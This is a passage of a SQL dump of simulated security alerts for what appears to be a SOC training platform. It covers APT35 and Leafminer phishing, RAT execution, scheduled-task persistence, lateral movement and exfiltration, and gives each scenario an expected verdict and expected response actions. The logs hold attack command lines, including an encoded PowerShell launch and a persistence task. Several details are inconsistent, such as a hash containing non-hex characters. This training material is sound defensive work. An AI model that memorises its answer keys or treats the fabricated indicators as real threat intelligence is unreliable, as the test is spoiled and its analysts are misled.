Directory\",\"verdict\":\"suspicious\",\"details\":\"User account showing unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT35 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains scripts used for maintaining persistent access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1107, 'Unauthorized Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'The attackers exploited stolen credentials to move laterally within the network, targeting critical systems within the telecommunications infrastructure. This activity indicates a sophisticated actor with a detailed understanding of the network topology.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-09-14T15:23:45Z\",\"source_ip\":\"192.168.1.23\",\"destination_ip\":\"192.168.2.45\",\"external_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"event\":\"Lateral Movement\",\"protocol\":\"SMB\",\"file_hash\":\"f2c7e3c9d5b6a8e1f8e4d2b3a9c1f7e8\",\"filename\":\"important_document.docx\",\"action\":\"login_success\",\"description\":\"Successful login from 192.168.1.23 to 192.168.2.45 using stolen credentials.\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Critical system targeted by lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"compromised\",\"details\":\"User account credentials were stolen and used for lateral 
movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f2c7e3c9d5b6a8e1f8e4d2b3a9c1f7e8\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File hash related to lateral movement activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1108, 'Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP) System', 'APT35 attempts to exfiltrate sensitive aerospace data through encrypted channels to external servers, marking the final stage of their operation.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T18:45:32Z\",\"src_ip\":\"10.0.1.45\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_user\":\"jdoe@aerospacecorp.com\",\"transfer_method\":\"Encrypted Channel\",\"destination_domain\":\"malicious-exfiltration.net\",\"file_name\":\"confidential_aerospace_data.zip\",\"file_hash\":\"3c6e0b8a9c15224a8228b9a98ca1531d\",\"action\":\"Blocked\",\"alert_id\":\"DLP-2023-Exfil-005\",\"detection_system\":\"DLP System v3.2\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT35 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.net\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by APT35 for data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_aerospace_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file identified in exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3c6e0b8a9c15224a8228b9a98ca1531d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Hash of the 
sensitive file being exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 
count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted 
Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1109, 'Initial Access via Phishing Email', 'high', 'Email Gateway Logs', 'Leafminer initiates its attack vector by sending spear-phishing emails to employees in targeted organizations, embedding malicious links that lead to the installation of the Total Commander RAT.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:07Z\",\"email_subject\":\"Urgent: Important Update Required\",\"sender_email\":\"hr_department@trustedcompany.com\",\"recipient_email\":\"john.doe@targetcompany.com\",\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.1.15\",\"malicious_url\":\"http://malicious-update.com/secure\",\"attachment\":\"Update_Your_Security.pdf\",\"attachment_hash\":\"2f4e54b5f6d8e23a1b3c9d4f7a8e5d9c7e6f1b3a4c8f9e0d2f1e4d5b6f7c8e9d\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted user\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-update.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"2f4e54b5f6d8e23a1b3c9d4f7a8e5d9c7e6f1b3a4c8f9e0d2f1e4d5b6f7c8e9d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash matches Total Commander RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.825Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1110, 'Execution of Total Commander RAT', 'high', 'Endpoint Detection and Response (EDR)', 'The Total Commander Remote Access Tool (RAT) was executed on an endpoint following the clicking of a malicious link. This has allowed the Leafminer group to potentially execute commands remotely and establish a foothold within the network.', 'Malware Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:37Z\",\"event_type\":\"Malware Execution\",\"host\":{\"hostname\":\"workstation-23\",\"ip\":\"192.168.1.45\"},\"user\":\"jdoe\",\"process\":{\"name\":\"cmd.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start totalcmd.exe\",\"pid\":4567},\"network\":{\"dst_ip\":\"203.0.113.52\",\"dst_port\":443,\"protocol\":\"TCP\"},\"file\":{\"name\":\"totalcmd.exe\",\"path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\totalcmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.52\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Leafminer group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Total Commander RAT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"totalcmd.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Downloaded executable file potentially used for remote access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1111, 'Establishing Persistence via Scheduled Tasks', 'high', 'Windows Event Logs', 'To ensure continued access, Leafminer sets up scheduled tasks that persistently re-launch the RAT, even after system reboots. The task was configured using a known malicious binary.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":4698,\"TaskCategory\":\"Scheduled Task Created\",\"ProviderName\":\"Microsoft-Windows-Security-Auditing\",\"TimeCreated\":\"2023-10-20T14:22:15.000Z\",\"EventRecordID\":123456,\"ProcessName\":\"schtasks.exe\",\"UserData\":{\"TaskName\":\"\\\\LeafminerPersistenceTask\",\"TaskContent\":{\"Command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Arguments\":\"/c C:\\\\Users\\\\Public\\\\leafminer_rat.exe\"}},\"ExecutionInfo\":{\"CreatorUser\":\"compromised_user\",\"CreatorDomain\":\"CORP\"},\"NetworkInfo\":{\"SourceIP\":\"10.0.0.15\",\"AttackerIP\":\"203.0.113.45\"},\"FileHash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"FileName\":\"leafminer_rat.exe\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Leafminer RAT binary.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"internal\",\"details\":\"User account used for suspicious task creation.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"leafminer_rat.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Lab\",\"verdict\":\"malicious\",\"details\":\"Executable file 
associated with Leafminer RAT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task 
Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
